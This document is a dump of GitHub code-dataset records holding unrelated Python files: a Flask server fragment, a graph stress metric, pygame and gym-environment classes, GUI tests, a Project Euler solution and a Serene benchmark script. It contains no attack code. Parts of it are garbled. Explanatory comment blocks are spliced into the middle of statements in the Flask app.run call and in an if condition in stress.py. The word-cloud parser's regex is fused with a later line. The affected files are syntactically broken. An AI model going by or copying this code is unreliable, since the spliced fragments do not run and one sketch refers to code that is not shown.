user[\"surname\"]\n return (jsonify(name=name, score=user['score'], rank=rank))\n\napi.add_resource(HomePage, '/homepage', methods=['GET'])\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', 
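# --- Added note + sketch (assumes the request fields are numeric codes and
# match the training columns): DTC.predict(new_data) in Analyze above passes
# a plain dict of strings, but scikit-learn expects a 2-D numeric array in
# the training feature layout, scaled with the same MinMaxScaler.
row = pd.DataFrame([new_data]).astype(float)  # one sample, numeric dtype
row = row[X_train.columns]                    # align column order with training
y_predicted = DTC.predict(scaler.transform(row))
# --- end added note ---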
port='8086')\n\n\n\n\n","repo_name":"duygusarialtun/DMSSProject","sub_path":"DMSSBackend/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":18856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25502044056","text":"#Author\n#Felice De Luca\n#https://github.com/felicedeluca\n\nimport networkx as nx\nimport math\n\n\ndef euclidean_distance(source, target):\n\n x_source1 = float(source['pos'].split(\",\")[0])\n x_target1 = float(target['pos'].split(\",\")[0])\n\n y_source1 = float(source['pos'].split(\",\")[1])\n y_target1 = float(target['pos'].split(\",\")[1])\n\n geomDistance = math.sqrt((x_source1 - x_target1)**2 + (y_source1 - y_target1)**2)\n\n return geomDistance\n\ndef scale_graph(G, alpha):\n\n H = G.copy()\n\n for currVStr in nx.nodes(H):\n\n currV = H.nodes[currVStr]\n\n x = float(currV['pos'].split(\",\")[0])\n y = float(currV['pos'].split(\",\")[1])\n\n x = x * alpha\n y = y * alpha\n\n currV['pos'] = str(x)+\",\"+str(y)\n\n return H\n\ndef computeScalingFactor(S, all_sp):\n num = 0\n den = 0\n\n nodes = list(nx.nodes(S))\n\n for i in range(0, len(nodes)):\n\n sourceStr = nodes[i]\n source = S.nodes[sourceStr]\n\n for j in range(i+1, len(nodes)):\n\n targetStr = nodes[j]\n\n if(sourceStr == targetStr):\n continue\n\n target = S.nodes[targetStr]\n\n graph_theoretic_distance = 0\n\n graph_theoretic_distance = len(all_sp[sourceStr][targetStr])-1\n\n geomDistance = euclidean_distance(source, target)\n\n if (graph_theoretic_distance <= 0):\n continue\n\n weight = 1/(graph_theoretic_distance**2)\n\n num = num + (graph_theoretic_distance * geomDistance * weight)\n den = den + (weight * (geomDistance**2))\n\n scale = num/den\n\n return scale\n\n\ndef stress(S, G=None, weighted=True, all_sp=None):\n '''Computes the strees of the layout S if the parameter G\n is passed it computes the stress of the layout S\n with respect the graph distances on G'''\n\n\n S_original = S.copy()\n\n alpha = 1\n\n if all_sp is None:\n if(G is None):\n if(weighted):\n # converting weights in float\n all_weights_n = nx.get_node_attributes(S, \"weight\")\n for nk in all_weights_n.keys():\n all_weights_n[nk] = float(all_weights_n[nk])\n nx.set_node_attributes(S, all_weights_n, \"weight\")\n\n all_weights_e = nx.get_edge_attributes(S, \"weight\")\n for ek in all_weights_e.keys():\n all_weights_e[ek] = float(all_weights_e[ek])\n nx.set_edge_attributes(S, all_weights_e, \"weight\")\n all_sp = nx.shortest_path(S, weight=\"weight\")\n else:\n all_sp = nx.shortest_path(S)\n else:\n if(weighted):\n # converting weights in float\n all_weights_n = nx.get_node_attributes(G, \"weight\")\n for nk in all_weights_n.keys():\n all_weights_n[nk] = float(all_weights_n[nk])\n nx.set_node_attributes(G, all_weights_n, \"weight\")\n\n all_weights_e = nx.get_edge_attributes(G, \"weight\")\n for ek in all_weights_e.keys():\n all_weights_e[ek] = float(all_weights_e[ek])\n nx.set_edge_attributes(G, all_weights_e, \"weight\")\n all_sp = nx.shortest_path(G, weight=\"weight\")\n else:\n all_sp = nx.shortest_path(G)\n\n alpha = computeScalingFactor(S_original, all_sp)\n\n S = scale_graph(S_original, alpha)\n\n vertices = list(nx.nodes(S))\n\n stress = 0\n\n for i in range(0, len(vertices)):\n\n sourceStr = vertices[i]\n source = S.nodes[sourceStr]\n\n for j in range(i+1, len(vertices)):\n\n targetStr = vertices[j]\n target = S.nodes[targetStr]\n\n graph_theoretic_distance = len(all_sp[sourceStr][targetStr])-1\n eu_dist = euclidean_distance(source, target)\n\n if 
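# --- Added derivation note: computeScalingFactor below minimizes the
# weighted stress over a uniform scale s,
#   stress(s) = sum_ij w_ij * (s * geom_ij - graph_ij)^2,  w_ij = 1 / graph_ij^2;
# setting d(stress)/ds = 0 gives
#   s = sum_ij (w_ij * graph_ij * geom_ij) / sum_ij (w_ij * geom_ij^2),
# which is exactly num / den in the function.
# --- end added note ---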
(graph_theoretic_distance <= 0):\n continue\n\n delta_squared = (eu_dist - graph_theoretic_distance)**2\n weight = 1/(graph_theoretic_distance**2)\n stress = stress + (weight * delta_squared)\n\n scale_graph(S, 1/alpha)\n\n\n stress = round(stress, 3)\n\n return stress\n","repo_name":"cns-iu/map4sci","sub_path":"data-processor/src/quality_measurement/original/stress.py","file_name":"stress.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"38517186683","text":"\"\"\"\r\n platformClass.py\r\n November 21st, 2016\r\n\r\n Class which creates platforms\r\n randomly of various sizes.\r\n\r\n Dylan Grandjean\r\n\"\"\"\r\nimport pygame, random\r\n\r\nclass PlatformClass(pygame.sprite.Sprite):\r\n def __init__(self, row, speed):\r\n \"\"\" Initialize class and pass in a row value and the current\r\n game speed.\"\"\"\r\n pygame.sprite.Sprite.__init__(self)\r\n\r\n #assign a row value to the platform. This value won't ever change\r\n self.row = row\r\n\r\n #assign random values for reseting purposes\r\n self.i = random.randint(30,240)\r\n self.x = random.randint(960, 3000)\r\n self.sec = 0\r\n\r\n #load images\r\n self.images = []\r\n self.images.append(pygame.image.load(\"assets/images/platforms/platform[0].png\"))\r\n self.images.append(pygame.image.load(\"assets/images/platforms/platform[1].png\"))\r\n self.images.append(pygame.image.load(\"assets/images/platforms/platform[2].png\"))\r\n\r\n #determine platform size and create rectangle\r\n self.n = random.randint(0, 2)\r\n self.image = self.images[self.n]\r\n self.image = self.image.convert()\r\n self.image.set_colorkey((255, 255, 255))\r\n self.rect = self.image.get_rect()\r\n\r\n #determine coordinates\r\n self.rect.left = self.x\r\n self.rect.centery = self.row\r\n\r\n #initialize speed relative to game speed\r\n self.dx = speed\r\n\r\n def update(self, screen, speed):\r\n \"\"\" Move the platform towards the left and resets its position\r\n and size whenever it exists the screen.\"\"\"\r\n self.rect.centerx -= speed\r\n if self.rect.right < 0:\r\n self.sec += 1\r\n if self.sec == self.i:\r\n self.reset(screen)\r\n\r\n def reset(self, screen):\r\n \"\"\" Changes the size, rectangle, and image of platform\r\n whenever it exists the screen.\"\"\"\r\n #assign new random values for resetting purposes\r\n self.i = random.randint(30,240)\r\n self.sec = 0\r\n\r\n #detemrine new size, image and rectangle\r\n self.n = random.randint(0, 2)\r\n self.image = self.images[self.n]\r\n self.image = self.image.convert()\r\n self.image.set_colorkey((255, 255, 255))\r\n self.rect = self.image.get_rect()\r\n\r\n #determine nes coordinates\r\n self.rect.left = screen.get_width()\r\n self.rect.centery = self.row\r\n \r\n \r\n","repo_name":"DDSGrandjean/Python_aroundTheWorld_fall2016","sub_path":"platformClass.py","file_name":"platformClass.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9908057563","text":"# AUTOSCRIPT NAME: EX2_POREVNO\n# CREATEDDATE: 2018-05-14 01:48:02\n# CREATEDBY: U3LO\n# CHANGEDATE: 2018-05-17 06:23:47\n# CHANGEBY: U34H\n# SCRIPTLANGUAGE: python\n# STATUS: Draft\n\nfrom psdi.server import 
MXServer\n\ninvoiceMbo=mbo.getOwner();\ninvoiceLineMboSet=invoiceMbo.getMboSet(\"INVOICELINE\");\ninvoicenum=mbo.getString(\"INVOICENUM\");\ninvoiceLineMboSet.reset();\ninvoiceMboSet=mbo.getMboSet(\"INVOICE\");\n\ndescriptionInvoice=invoiceMbo.getString(\"DESCRIPTION\");\n\npoRevisioNum='';\n\ninvoiceMbo.setValue(\"DESCRIPTION\",\"\");\n\npoMboSet=invoiceMbo.getMboSet(\"PO\");\npoMboSet.reset();\n\nstatus=invoiceMbo.getString(\"STATUS\");\n\nif(poMboSet is not None and poMboSet!=''):\n poRevisioNum=poMboSet.getMbo(0).getString(\"REVISIONNUM\");\n \ninvoicelineCount=invoiceLineMboSet.count();\n\nif(invoicelineCount>0):\n for i in range(invoicelineCount) :\n invoicelineMbo=invoiceLineMboSet.getMbo(i);\n invoicelineMbo.setValue(\"POREVISIONNUM\",poRevisioNum)\n\ninvoiceMbo.setValue(\"DESCRIPTION\",descriptionInvoice);","repo_name":"git786hub/Dynatrace_python","sub_path":"src/EX2_POREVNO.py","file_name":"EX2_POREVNO.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5153934443","text":"import re\nfrom collections import Counter\n\ndef remove_html_tags(text: str) -> str:\n expression = re.compile(r'<[^>]+>|/>|br />|= 5])\n\n counter = Counter(data)\n frequencies = sorted(counter.items(), key=lambda x: x[1], reverse=True)\n wordcloud = [word for word, _ in frequencies]\n text = remove_html_tags(', '.join(wordcloud[:15]))\n\n return text\n","repo_name":"DSM-FATEC/fatec_dsm_pln_chatbot_movies","sub_path":"backend/parsers/word_cloud_parser.py","file_name":"word_cloud_parser.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70106630008","text":"import unittest\nfrom nsswstunnel.reactor import *\n\nclass NSSReactorTests(unittest.TestCase):\n def test_http(self):\n \"\"\"a simplistic test by building http client and run a GET query\"\"\"\n install()\n import os\n from twisted.web.client import HTTPClientFactory\n from twisted.internet import reactor\n nss.nss_init('sql:' + os.path.expanduser('~/.pki/nssdb'))\n ssl.set_domestic_policy()\n # nss.set_password_callback(password_callback)\n\n factory = HTTPClientFactory(b'https://baidu.com/')\n # factory = HTTPClientFactory(b'http://baidu.com/')\n\n def cb_response(*args, **kwargs):\n print('response: %r, %r' % (args, kwargs))\n self.fail()\n\n def cb_err(*args, **kwargs):\n print('err: %r, %r' % (args, kwargs))\n self.fail()\n\n def cb_close(ignored):\n reactor.stop()\n\n factory.deferred.addCallbacks(cb_response, cb_err)\n factory.deferred.addBoth(cb_close)\n # reactor.connectTCP('baidu.com', 80, factory)\n reactor.connectSSL('baidu.com', 443, factory, contextFactory=None)\n reactor.run()\n\n","repo_name":"tdihp/nsswstunnel","sub_path":"nsswstunnel/test/_test_reactor.py","file_name":"_test_reactor.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28241397487","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nProject Euler Problem 69:\n\nEuler's Totient function, φ(n) [sometimes called the phi function], is used to determine the number of numbers less than\nn which are relatively prime to n. 
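# --- Added reconstruction sketch: the word_cloud_parser record above looks
# extraction-damaged (the regex literal and a later comprehension are fused
# into one line). A plausible reading, with the second function's name and
# the exact regex being assumptions:
import re
from collections import Counter

def remove_html_tags(text: str) -> str:
    return re.sub(r'<[^>]+>', '', text)

def build_word_cloud(data) -> str:
    data = [word for word in data if len(word) >= 5]
    counter = Counter(data)
    frequencies = sorted(counter.items(), key=lambda x: x[1], reverse=True)
    wordcloud = [word for word, _ in frequencies]
    return remove_html_tags(', '.join(wordcloud[:15]))
# --- end added sketch ---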
For example, as 1, 2, 4, 5, 7, and 8, are all less than nine and relatively prime to\nnine, φ(9)=6.\n\nn Relatively Prime φ(n) n/φ(n)\n2 1 1 2\n3 1,2 2 1.5\n4 1,3 2 2\n5 1,2,3,4 4 1.25\n6 1,5 2 3\n7 1,2,3,4,5,6 6 1.1666...\n8 1,3,5,7 4 2\n9 1,2,4,5,7,8 6 1.5\n10 1,3,7,9 4 2.5\n\nIt can be seen that n=6 produces a maximum n/φ(n) for n ≤ 10.\n\nFind the value of n ≤ 1,000,000 for which n/φ(n) is a maximum.\n\"\"\"\n\n# Brute force-ish, runs in ~40 seconds\n\nfrom sympy.ntheory import primefactors\nfrom functools import reduce\nimport operator\n\ndef phi(n):\n    return round(n * reduce(operator.mul, map(lambda p: 1 - 1/p, primefactors(n))))\n\nmax_frac = -1\nmax_n = 0\n\n# upper bound is 1000001 so that n = 1,000,000 itself is checked, as the problem requires\nfor n in range(2, 1000001):\n    frac = n / phi(n)\n    if frac > max_frac:\n        max_frac = frac\n        max_n = n\n\nprint(max_n)\n","repo_name":"ryandancy/project-euler","sub_path":"problem69.py","file_name":"problem69.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72873542329","text":"from typing import Optional\nfrom unittest.mock import Mock, call, patch\n\nfrom pytest import fixture, mark\n\nfrom wxviews import inspection\nfrom wxviews.inspection import ViewInspectionFrame, ViewInspectionInfoPanel, ViewInspectionTool, ViewInspectionTree\nfrom wxviews.widgets.rendering import WxNode\n\n\n@fixture\ndef tool_fixture(request):\n    with patch(f'{inspection.__name__}.get_root') as get_root:\n        root = WxNode(Mock(), Mock())\n        top_window = Mock()\n        root.instance.GetTopWindow = Mock()\n        root.instance.GetTopWindow.side_effect = lambda: top_window\n        get_root.side_effect = lambda: root\n\n        request.cls.root = root\n        request.cls.top_window = top_window\n        with patch(f'{inspection.__name__}.{ViewInspectionFrame.__name__}') as frame_init:\n            frame = Mock()\n            frame_init.side_effect = lambda *a, **kw: frame\n            request.cls.frame_init = frame_init\n            request.cls.frame = frame\n            request.cls.tool = ViewInspectionTool()\n            yield frame_init\n\n\n@mark.usefixtures('tool_fixture')\nclass ViewInspectionToolTests:\n    \"\"\"ViewInspectionTool tests\"\"\"\n\n    frame: Mock\n    frame_init: Mock\n    top_window: Mock\n    root: WxNode\n    tool: ViewInspectionTool\n\n    def test_creates_frame(self):\n        \"\"\"should create frame with parameters\"\"\"\n        pos = Mock()\n        size = Mock()\n        config = Mock()\n        crust_locals = Mock()\n        tool = ViewInspectionTool(pos = pos, size = size, config = config, crust_locals = crust_locals)\n\n        tool.show()\n\n        assert self.frame_init.call_args == call(\n            parent = self.top_window,\n            pos = pos,\n            size = size,\n            config = config,\n            locals = crust_locals,\n            app = self.root.instance,\n            root = self.root\n        )\n\n    @mark.parametrize('select_obj', [None, Mock()])\n    def test_sets_passed_object(self, select_obj):\n        \"\"\"should set passed object (or root) on frame\"\"\"\n        expected = select_obj if select_obj else self.root\n\n        self.tool.show(select_obj)\n\n        assert self.frame.SetObj.call_args == call(expected)\n\n    @mark.parametrize('select_obj', [None, Mock()])\n    def test_shows_frame(self, select_obj):\n        \"\"\"should show and raise frame\"\"\"\n        self.tool.show(select_obj)\n\n        assert self.frame.Show.called\n        assert self.frame.Raise.called\n\n\n@fixture\ndef frame_fixture(request):\n    with patch(f'{inspection.__name__}.InspectionFrame.__init__') as frame_init:\n        frame_init.side_effect = _frame_init\n        request.cls.frame_init = frame_init\n        yield frame_init\n\n\ndef _frame_init(frame, *_, **__):\n    frame.locals = {}\n\n\n@mark.usefixtures('frame_fixture')\nclass 
ViewInspectionFrameTests:\n \"\"\"ViewInspectionFrame tests\"\"\"\n\n frame_init: Mock\n\n def tests_sets_root_to_locals(self):\n \"\"\"should add root node to crust locals\"\"\"\n pos = Mock()\n size = Mock()\n config = Mock()\n crust_locals = Mock()\n root = Mock()\n parent = Mock()\n app = Mock()\n\n frame = ViewInspectionFrame(\n parent = parent, pos = pos, size = size, config = config, locals = crust_locals, app = app, root = root\n )\n\n assert self.frame_init.call_args == call(\n frame, parent = parent, pos = pos, size = size, config = config, locals = crust_locals, app = app\n )\n assert frame.locals['root'] == root\n\n\n@fixture\ndef tree_fixture(request):\n with patch(f'{inspection.__name__}.get_root') as get_root:\n root = WxNode(Mock(), Mock())\n get_root.side_effect = lambda: root\n request.cls.root = root\n with patch(f'{inspection.__name__}.InspectionTree.__init__') as tree_init:\n tree_init.side_effect = lambda *a, **kw: None\n with patch(f'{inspection.__name__}.InspectionTree.BuildTree') as super_build:\n tree = ViewInspectionTree()\n tree.roots = []\n tree.built = False\n tree.DeleteAllItems = Mock()\n tree.SetItemData = Mock()\n tree.SelectObj = Mock()\n tree.AppendItem = Mock()\n\n tree.GetCount = Mock()\n tree.GetCount.side_effect = lambda: 0\n\n root_item = Mock()\n tree.AddRoot = Mock()\n tree.AddRoot.side_effect = lambda *a: root_item\n\n request.cls.tree = tree\n request.cls.root_item = root_item\n request.cls.super_build = super_build\n yield super_build\n\n\nclass Item:\n\n def __init__(self, parent, name = None):\n self.parent: str = parent\n self.name: str = name\n\n def __eq__(self, other):\n return self.parent == other.parent and self.name == other.name\n\n def __hash__(self):\n return hash((self.parent, self.name))\n\n\ndef _node(name, children = None):\n node = WxNode(name, Mock())\n node._children = children if children else []\n return node\n\n\n@mark.usefixtures('tree_fixture')\nclass ViewInspectionTreeTests:\n \"\"\"ViewInspectionTree tests\"\"\"\n\n root: WxNode\n tree: ViewInspectionTree\n root_item: Mock\n super_build: Mock\n\n @mark.parametrize('items_count, should_clear', [\n (0, False),\n (1, True),\n (5, True)\n ]) # yapf: disable\n def test_clears_tree_before_build(self, items_count, should_clear):\n \"\"\"should clear tree before build\"\"\"\n self.tree.GetCount.side_effect = lambda c = items_count: c\n\n self.tree.BuildTree(self.root)\n\n assert self.tree.DeleteAllItems.called == should_clear\n\n def test_sets_root_node(self):\n \"\"\"should set app node as tree root\"\"\"\n self.tree.BuildTree(WxNode(Mock(), Mock()))\n\n assert self.tree.AddRoot.call_args == call(self.tree._get_node_name(self.root))\n assert self.tree.SetItemData.call_args_list[0] == call(self.root_item, self.root)\n assert self.tree.roots == [self.root_item]\n\n @mark.parametrize('children, items', [\n ([], []),\n ([_node('1')], [Item('root', '1')]),\n ([_node('1'), _node('2')], [Item('root', '1'), Item('root', '2')]),\n ([\n _node('1', [_node('1.1'), _node('1.2')]),\n _node('2', [_node('2.1')])\n ],\n [\n Item('root', '1'),\n Item('1', '1.1'), Item('1', '1.2'),\n Item('root', '2'),\n Item('2', '2.1')\n ]),\n ([\n _node('1', [_node('1.1')]),\n _node('2', [\n _node('2.1', [_node('2.1.1')]),\n _node('2.2', [_node('2.2.1'), _node('2.2.2')]),\n ])\n ],\n [\n Item('root', '1'), Item('1', '1.1'),\n Item('root', '2'),\n Item('2', '2.1'), Item('2.1', '2.1.1'),\n Item('2', '2.2'), Item('2.2', '2.2.1'), Item('2.2', '2.2.2')\n ])\n ]) # yapf: disable\n def test_adds_children(self, 
children, items):\n \"\"\"Should add node children to tree\"\"\"\n actual_items = []\n self.root._children = children\n self.root._instance = 'root'\n self.tree.AddRoot.side_effect = lambda _: Item('')\n self.tree.AppendItem.side_effect = lambda parent, _: Item(parent.name)\n self.tree.SetItemData.side_effect = lambda item, node: self._set_item_data(item, node, actual_items)\n\n self.tree.BuildTree(self.root)\n\n assert actual_items == [Item('', 'root')] + items\n\n @staticmethod\n def _set_item_data(item, node, items):\n item.name = node.instance\n items.append(item)\n\n def test_selects_obj(self):\n \"\"\"should select start node\"\"\"\n node = WxNode(Mock(), Mock())\n self.tree.BuildTree(node)\n\n assert self.tree.SelectObj.call_args == call(node)\n\n def test_sets_built_flag(self):\n \"\"\"should set built flag to true\"\"\"\n self.tree.BuildTree(WxNode(Mock(), Mock()))\n\n assert self.tree.built\n\n @mark.parametrize(\n 'start_widget, include_sizers, expand_frame', [(Mock(), False, True), (Item(''), True, False),\n (Mock(), True, True), (Item('root'), False, False)]\n )\n def test_builds_widget_tree_for_widget(self, start_widget, include_sizers, expand_frame):\n \"\"\"should build default widget tree if passed object other then Node\"\"\"\n self.tree.BuildTree(start_widget, include_sizers, expand_frame)\n\n assert self.super_build.call_args == call(\n start_widget, includeSizers = include_sizers, expandFrame = expand_frame\n )\n\n\n@fixture\ndef info_fixture(request):\n with patch(f'{inspection.__name__}.InspectionInfoPanel.__init__'), \\\n patch(f'{inspection.__name__}.InspectionInfoPanel.UpdateInfo') as super_update_info:\n request.cls.result = None\n info = ViewInspectionInfoPanel()\n info.SetText = Mock()\n info.SetText.side_effect = lambda text, test = request.cls: setattr(test, 'result', text)\n info.SetReadOnly = Mock()\n\n request.cls.info = info\n request.cls.super_update_info = super_update_info\n yield super_update_info\n\n\n@mark.usefixtures('info_fixture')\nclass ViewInspectionInfoPanelTests:\n \"\"\"ViewInspectionInfoPanel tests\"\"\"\n\n info: ViewInspectionInfoPanel\n super_update_info: Mock\n result: Optional[str]\n\n def test_checks_object_none(self):\n \"\"\"Should set message that object is None\"\"\"\n self.info.UpdateInfo(None)\n\n assert self.result == 'Item is None or has been destroyed.'\n\n @mark.parametrize('obj', [Mock(), Item('')])\n def test_uses_super_info(self, obj):\n \"\"\"should use super().UpdateInfo() for object other than Node\"\"\"\n self.info.UpdateInfo(obj)\n\n assert self.super_update_info.call_args == call(obj)\n\n @mark.parametrize('error', [RuntimeError()])\n def test_handles_error(self, error: Exception):\n \"\"\"should str errors and say that can't show info\"\"\"\n self.super_update_info.side_effect = lambda _: self._raise(error)\n self.info.UpdateInfo(Mock())\n\n assert self.result is not None\n assert self.result.startswith('Failed to show info.')\n\n @staticmethod\n def _raise(error):\n raise error\n","repo_name":"eumis/wxviews","sub_path":"wxviews/tests/inspection_tests.py","file_name":"inspection_tests.py","file_ext":"py","file_size_in_byte":10285,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"8446897985","text":"import gym\nfrom gym import error, spaces, utils\nfrom gym.utils import seeding\nimport pandas as pd\nimport random\nimport json\n\n\"\"\"\nhttps://pytorch.org/tutorials/intermediate/reinforcement_q_learning.html#dqn-algorithm\n\n\"\"\"\n\n\nclass 
FraudDetectionEnv(gym.Env):\n def __init__(self):\n \"\"\"\n action space -\n\n 0 -> non_fraud\n 1 -> fraud\n\n Observation space -\n\n 1 -> correctly predicted\n 2 -> wrongly predicted\n\n Rewards -\n\n +1 : correct prediction\n -1 : wrong prediction\n 0 : initial value of reward\n\n Episode termination -\n\n An episode will terminate if agent guesses correctly (cummulative_reward > 0) or 200 steps have been completed\n\n Experience Replay -\n\n Agent will use experience replay for guidance\n\n \"\"\"\n self.credit_card_dataset = './dataset/creditcard.csv'\n self.df_credit_card = pd.DataFrame(pd.read_csv(self.credit_card_dataset))\n\n self.ACTION_LOOKUP = {0: 'not_fraud', 1: 'fraud'}\n\n self.observation_space = spaces.Discrete(self.df_credit_card.shape[0])\n self.action_space = spaces.Discrete(len(self.ACTION_LOOKUP))\n\n\n self.observation = 0\n\n self.initial_state = 0\n\n self.episode_over = False\n self.turns = 0\n self.turns_max = 200\n self.cummulative_rewards = 0\n self.action = 0\n self.state_idx = 0\n self.state = self.df_credit_card.iloc[self.state_idx, :]\n\n self.true_positives = 0\n self.true_negatives = 0\n self.false_postives = 0\n self.false_negatives = 0\n\n self.total_positive_cases, self.total_negative_cases = self.total_positives_and_negatives()\n\n\n def total_positives_and_negatives(self):\n n_fraud = 0\n n_non_fraud = 0\n for state_idx in range(self.df_credit_card.shape[0]):\n if self.label_for(state_idx) == 1:\n n_fraud += 1\n else:\n n_non_fraud += 1\n\n return (n_fraud, n_non_fraud)\n\n\n\n def create_info_json_data(self, true_positive_rate, false_positive_rate):\n data_set = {\"true_positive_rate\" : true_positive_rate,\n \"false_positive_rate\": false_positive_rate,\n }\n return json.dumps(data_set)\n\n\n def label_for(self, state_idx):\n return self.df_credit_card.iloc[state_idx]['Class']\n\n # this step will return (next_state, reward, episode_over, more_info (tpr, tnr, fpr, fnr))\n def step(self, action):\n \"\"\"\n Parameters\n ----------\n action_index :\n Returns\n -------\n ob, reward, episode_over, info : tuple\n ob (object) :\n an environment-specific object representing your observation of\n the environment.\n reward (float) :\n amount of reward achieved by the previous action. The scale\n varies between environments, but the goal is always to increase\n your total reward.\n episode_over (bool) :\n whether it's time to reset the environment again. Most (but not\n all) tasks are divided up into well-defined episodes, and done\n being True indicates the episode has terminated. (For example,\n perhaps the pole tipped too far, or you lost your last life.)\n info (dict) :\n diagnostic information useful for debugging. 
It can sometimes\n            be useful for learning (for example, it might contain the raw\n            probabilities behind the environment's last state change).\n            However, official evaluations of your agent are not allowed to\n            use this for learning.\n        \"\"\"\n\n        # extracting next state\n        #assert self.action_space.contains(action)\n\n        label_for_current_state = self.label_for(self.state_idx)\n\n        # reward\n        reward = 0\n\n\n        # agent predicted fraud\n        if action == 1:\n            if label_for_current_state == 1:\n                self.true_positives += 1\n                reward += 1\n            else:\n                self.false_postives += 1\n                reward -= 1\n\n        # agent predicted non_fraud\n        elif action == 0:\n            if label_for_current_state == 0:\n                self.true_negatives += 1\n                reward += 1\n            else:\n                self.false_negatives += 1\n                reward -= 1\n\n        if self.state_idx <= self.df_credit_card.shape[0] - 2:\n            self.state_idx += 1\n\n        self.turns += 1\n\n        fpr = self.false_postives / (self.false_postives + self.true_negatives)\n        tpr = self.true_positives / (self.true_positives + self.false_negatives)\n\n        info = self.create_info_json_data(tpr, fpr)\n\n        if self.state_idx == (self.df_credit_card.shape[0]-1):\n            self.episode_over = True\n\n        print('State idx : {}'.format(self.state_idx))\n        print('Value of next_state : {}'.format(self.df_credit_card.iloc[self.state_idx, :-1].values))\n\n\n\n        return self.df_credit_card.iloc[self.state_idx, :-1].values, reward, self.episode_over, info\n\n    \n\n    def reset(self):\n        self.turns = 0\n        self.episode_over = False\n        self.sum_rewards = 0.0\n\n\n    def seed(self, seed=None):\n        self.np_random, seed = seeding.np_random(seed)\n        return [seed]\n","repo_name":"purvasingh96/gym-fraud-detection","sub_path":"gym_fraud_detection/envs/fraud_detection_env.py","file_name":"fraud_detection_env.py","file_ext":"py","file_size_in_byte":5608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"29685523982","text":"from pyecharts import options as opts\nfrom pyecharts.charts import Map\nimport numpy as np\n# render the geographic map chart\ndef weatherAna(filename):\n\t# read the precipitation data\n    wea_data=np.loadtxt(filename,dtype=str,delimiter=\",\",encoding=\"GBK\")\n    map=(\n        Map().add(\"降雨(mm)\",wea_data,\"河南\")\n        .set_global_opts(title_opts=opts.TitleOpts(title=\"河南省降水示例\"),\n\tvisualmap_opts=opts.VisualMapOpts(max_=300,is_piecewise=True))\n    \t)\n    map.render(\"weather.html\")\t# render the HTML file\n\nif __name__ == '__main__':\n    weatherAna(\"weather.csv\")\n","repo_name":"ldjackie/ldjackie","sub_path":"code/chapter9/9-3降水数据分析与可视化.py","file_name":"9-3降水数据分析与可视化.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14019015052","text":"# ===========\n# SETUP\n# ===========\ntry:\n    import serene\nexcept ImportError as e:\n    import sys\n    sys.path.insert(0, '.')\n    import serene\n\nimport os\nimport time\nimport tarfile\nimport tempfile\nfrom pprint import pprint\n\nfrom serene import SSD, Status, DataProperty, Mapping, ObjectProperty, Column, Class, DataNode, ClassNode\nfrom serene.elements.semantics.base import KARMA_DEFAULT_NS\n\n\n# =======================\n#\n# Step 1: Start with a connection to the server...\n#\n# =======================\nsn = serene.Serene(\n    host='127.0.0.1',\n    port=8080,\n)\nprint(sn)\n\nbenchmark_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), \"tests\", \"resources\", \"museum_benchmark\")\nprint(\"benchmark_path: \", benchmark_path)\n\nprint(\"========Optional cleaning=============\")\n# Removes all server elements\nfor octo in sn.octopii.items:\n 
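    # remove every octopus left over from a previous run so the demo starts against a clean server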
sn.octopii.remove(octo)\n\nfor ssd in sn.ssds.items:\n sn.ssds.remove(ssd)\n\nfor ds in sn.datasets.items:\n sn.datasets.remove(ds)\n\nfor on in sn.ontologies.items:\n sn.ontologies.remove(on)\n\n# =======================\n#\n# Step 2: Add ontologies from the museum benchmark\n#\n# =======================\nowl_dir = os.path.join(benchmark_path, \"owl\")\n\nontologies = []\nfor path in os.listdir(owl_dir):\n f = os.path.join(owl_dir, path)\n ontologies.append(sn.ontologies.upload(f))\n\nprint(\"*********** Ontologies from museum benchmark\")\nfor onto in ontologies:\n print(onto)\nprint()\n\n# =======================\n#\n# Step 3: Add datasets from the museum benchmark and corresponding semantic source descriptions\n#\n# =======================\ndataset_dir = os.path.join(benchmark_path, \"dataset\")\nssd_dir = os.path.join(benchmark_path, \"ssd\")\n\ndatasets = [] # list of museum datasets\nssds = [] # list of semantic source descriptions from museum benchmark\n\n# we need to unzip first the data\nif os.path.exists(os.path.join(dataset_dir, \"data.tar.gz\")):\n with tarfile.open(os.path.join(dataset_dir, \"data.tar.gz\")) as f:\n f.extractall(path=dataset_dir)\n\ninput(\"Press enter to upload datasets and ssds...\")\n\nfor ds in os.listdir(dataset_dir):\n if ds.endswith(\".gz\"):\n continue\n ds_f = os.path.join(dataset_dir, ds)\n ds_name = os.path.splitext(ds)[0]\n # associated semantic source description for this dataset\n ssd_f = os.path.join(ssd_dir, ds_name + \".ssd\")\n\n print(\"Adding dataset: \" + str(ds_f))\n dataset = sn.datasets.upload(ds_f, description=\"museum_benchmark\")\n datasets.append(dataset)\n\n print(\"Adding ssd: \" + str(ssd_f))\n new_json = dataset.bind_ssd(ssd_f, ontologies, KARMA_DEFAULT_NS)\n # _logger.info(\"+++++++++++ obtained ssd json\")\n # _logger.info(new_json)\n if len(new_json[\"mappings\"]) < 1:\n print(\" --> skipping this file...\")\n continue\n else:\n empty_ssd = SSD(dataset, ontologies)\n ssd 